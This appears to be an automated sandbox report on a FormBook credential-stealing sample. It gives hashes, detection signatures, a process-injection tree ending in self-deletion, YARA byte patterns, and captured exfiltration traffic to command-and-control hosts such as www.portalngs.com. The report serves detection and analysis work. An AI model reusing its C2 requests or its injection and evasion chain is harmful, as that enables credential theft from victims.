Analysis Report M015Tob0Z8.exe

Overview

General Information

Sample Name: M015Tob0Z8.exe
Analysis ID: 287789
MD5: d302a55d33c34c382c7518fdefd49efa
SHA1: 0601338d74705de83a331a7a60b7e175bc931329
SHA256: 34eeebc4197df0980b621253c336662f3868ccc65a5f99a832d47751d4d5384e
Tags: exe

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • M015Tob0Z8.exe (PID: 7120 cmdline: 'C:\Users\user\Desktop\M015Tob0Z8.exe' MD5: D302A55D33C34C382C7518FDEFD49EFA)
    • M015Tob0Z8.exe (PID: 7152 cmdline: 'C:\Users\user\Desktop\M015Tob0Z8.exe' MD5: D302A55D33C34C382C7518FDEFD49EFA)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 5480 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 5012 cmdline: /c del 'C:\Users\user\Desktop\M015Tob0Z8.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 2d-hc6qljl.exe (PID: 580 cmdline: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exe MD5: D302A55D33C34C382C7518FDEFD49EFA)
          • 2d-hc6qljl.exe (PID: 5264 cmdline: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exe MD5: D302A55D33C34C382C7518FDEFD49EFA)
        • cmd.exe (PID: 5504 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18339:$sqlite3step: 68 34 1C 7B E1
    • 0x1844c:$sqlite3step: 68 34 1C 7B E1
    • 0x18368:$sqlite3text: 68 38 2A 90 C5
    • 0x1848d:$sqlite3text: 68 38 2A 90 C5
    • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
0000001C.00000002.446486312.0000000000790000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000001C.00000002.446486312.0000000000790000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author | Strings
24.2.2d-hc6qljl.exe.2b80000.2.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
24.2.2d-hc6qljl.exe.2b80000.2.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
24.2.2d-hc6qljl.exe.2b80000.2.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
24.2.2d-hc6qljl.exe.2bc0000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
24.2.2d-hc6qljl.exe.2bc0000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: M015Tob0Z8.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exe | Avira: detection malicious, Label: TR/Kryptik.gyvjt
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exe | Virustotal: Detection: 76%
Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\Galrhv4ix\2d-hc6qljl.exe | Virustotal: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\Galrhv4ix\2d-hc6qljl.exe | ReversingLabs: Detection: 83%
Multi AV Scanner detection for submitted file
Source: M015Tob0Z8.exe | Virustotal: Detection: 76%
Source: M015Tob0Z8.exe | ReversingLabs: Detection: 83%
Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.446486312.0000000000790000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.262475630.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.263360451.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.480975556.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.420809958.0000000002BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.445002981.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.444941297.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.420767972.0000000002B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000001.419043407.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.218665040.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.444745055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.222201466.00000000041C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.261343360.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.483279481.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.222170846.0000000004190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 24.2.2d-hc6qljl.exe.2b80000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.2d-hc6qljl.exe.2bc0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.M015Tob0Z8.exe.41c0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.M015Tob0Z8.exe.41c0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.M015Tob0Z8.exe.4190000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.2d-hc6qljl.exe.2bc0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.1.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.1.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.2d-hc6qljl.exe.2b80000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.M015Tob0Z8.exe.4190000.2.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: M015Tob0Z8.exe | Joe Sandbox ML: detected
Source: 1.2.M015Tob0Z8.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.M015Tob0Z8.exe.41c0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 24.2.2d-hc6qljl.exe.2b80000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 24.2.2d-hc6qljl.exe.2bc0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 25.2.2d-hc6qljl.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.M015Tob0Z8.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 25.1.2d-hc6qljl.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.M015Tob0Z8.exe.4190000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\M015Tob0Z8.exe | Code function: 0_2_00408D20 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_00408D20
Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exe | Code function: 24_2_00405BE0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,24_2_00405BE0
Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exe | Code function: 24_2_00408D20 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,24_2_00408D20
Source: global traffic | HTTP traffic detected: GET /3nk4/?0V0hlT=ghO43p2HD4iLw&vDK8K=97HxSoDRqvNjqodSIW3EXGm+6HMYetQdLuCRAA5cNzNsRSMATlFDeDmb1zb9cgQrzPNe HTTP/1.1 | Host: www.andrew-vencetore.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /3nk4/?0V0hlT=ghO43p2HD4iLw&vDK8K=UNJal7Hmn8/c6F+9a2RfkhdNz0trsYIy+PXlM39sodsvkAbf34VFCmjCjjxOfJ03KVSC HTTP/1.1 | Host: www.portalngs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: Joe Sandbox View | ASN Name: LocawebServicosdeInternetSABR LocawebServicosdeInternetSABR
Source: global traffic | HTTP traffic detected: POST /3nk4/ HTTP/1.1 | Host: www.portalngs.com | Connection: close | Content-Length: 411 | Cache-Control: no-cache | Origin: http://www.portalngs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.portalngs.com/3nk4/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii: vDK8K=cvFg7cyQneiql0noPGRC7h9C02BDsrQlt_W-clJrg9pukDb02dg2RBvGwx5QCdwbRViNsRjEJMkX6WxryusX0RjRaMt1hRgx8RCowx(26nG6kP8lVGOjB4qjO8iw2-gaip8bNFmaOBl8D2g2nrtafCAmv6I4Iq4bVoaMYcFO1BqDEvVZgvPd9zVlY7f4oUG940IsPuoS~tsOqYmJuOF0OdSYLnoAVfkTosC8xnrGlf9dnILdkVp5NbVgY2c6HfeC4IzHTiu2xP88igVUU1fQ0FG2(1YiJkCZ2cmjBQtRrPM40I~sJRZ81K1y26d8yAZMhrbelhQT3RcjmyI-MHz1xS(Vs9mLYpf0JburP_kWUm3lkUQgnHqjQ6(XxvyvUi~hgEMcl3fR(8zBR9k6sQ).
Source: global traffic | HTTP traffic detected: POST /3nk4/ HTTP/1.1 | Host: www.portalngs.com | Connection: close | Content-Length: 187951 | Cache-Control: no-cache | Origin: http://www.portalngs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.portalngs.com/3nk4/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii: (187951-byte form-encoded body, not reproduced)
Source: C:\Windows\explorer.exe | Code function: 2_2_04B9E722 getaddrinfo,setsockopt,recv,2_2_04B9E722
Source: unknown | DNS traffic detected: queries for: www.andrew-vencetore.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 20 Sep 2020 04:02:11 GMT | Server: Apache | Vary: accept-language,accept-charset | Accept-Ranges: bytes | Connection: close | Transfer-Encoding: chunked | Content-Type: text/html; charset=iso-8859-1 | Content-Language: en | Data: chunked HTML body (Apache "Object not found!" error page, raw bytes not reproduced)
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000002.495776403.0000000004BBB000.00000040.00000001.sdmp, rundll32.exe, 00000004.00000002.487089974.0000000005019000.00000004.00000001.sdmp | String found in binary or memory: http://www.portalngs.com
Source: explorer.exe, 00000002.00000002.495776403.0000000004BBB000.00000040.00000001.sdmp, rundll32.exe, 00000004.00000002.487089974.0000000005019000.00000004.00000001.sdmp | String found in binary or memory: http://www.portalngs.com/3nk4/
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: rundll32.exe, 00000004.00000002.480914900.0000000000858000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_00424C58 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,0_2_00424C58
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_0043A784 GetKeyboardState,0_2_0043A784

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001C.00000002.446486312.0000000000790000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.262475630.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.263360451.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.480975556.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000018.00000002.420809958.0000000002BC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000019.00000002.445002981.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000019.00000002.444941297.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000018.00000002.420767972.0000000002B80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000019.00000001.419043407.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000001.218665040.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000019.00000002.444745055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.222201466.00000000041C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.261343360.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.483279481.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.222170846.0000000004190000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 24.2.2d-hc6qljl.exe.2b80000.2.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 24.2.2d-hc6qljl.exe.2bc0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 25.2.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.M015Tob0Z8.exe.41c0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.M015Tob0Z8.exe.41c0000.3.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.M015Tob0Z8.exe.4190000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 24.2.2d-hc6qljl.exe.2bc0000.3.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 25.2.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.1.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.1.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 25.1.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 25.1.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 24.2.2d-hc6qljl.exe.2b80000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.M015Tob0Z8.exe.4190000.2.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\rundll32.exe Dropped file: C:\Users\user\AppData\Roaming\K4A5-D33\K4Alogri.ini
          Source: C:\Windows\SysWOW64\rundll32.exe Dropped file: C:\Users\user\AppData\Roaming\K4A5-D33\K4Alogrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.446486312.0000000000790000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.446486312.0000000000790000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.262475630.00000000009E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.262475630.00000000009E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263360451.0000000000D40000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263360451.0000000000D40000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.480975556.0000000000890000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.480975556.0000000000890000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.420809958.0000000002BC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.420809958.0000000002BC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.445002981.00000000009D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.445002981.00000000009D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.444941297.00000000006A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.444941297.00000000006A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.420767972.0000000002B80000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.420767972.0000000002B80000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000001.419043407.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000001.419043407.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.218665040.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.218665040.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.444745055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.444745055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.222201466.00000000041C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.222201466.00000000041C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.261343360.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.261343360.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.483279481.0000000002F90000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.483279481.0000000002F90000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.222170846.0000000004190000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.222170846.0000000004190000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 24.2.2d-hc6qljl.exe.2b80000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.2.2d-hc6qljl.exe.2b80000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 24.2.2d-hc6qljl.exe.2bc0000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
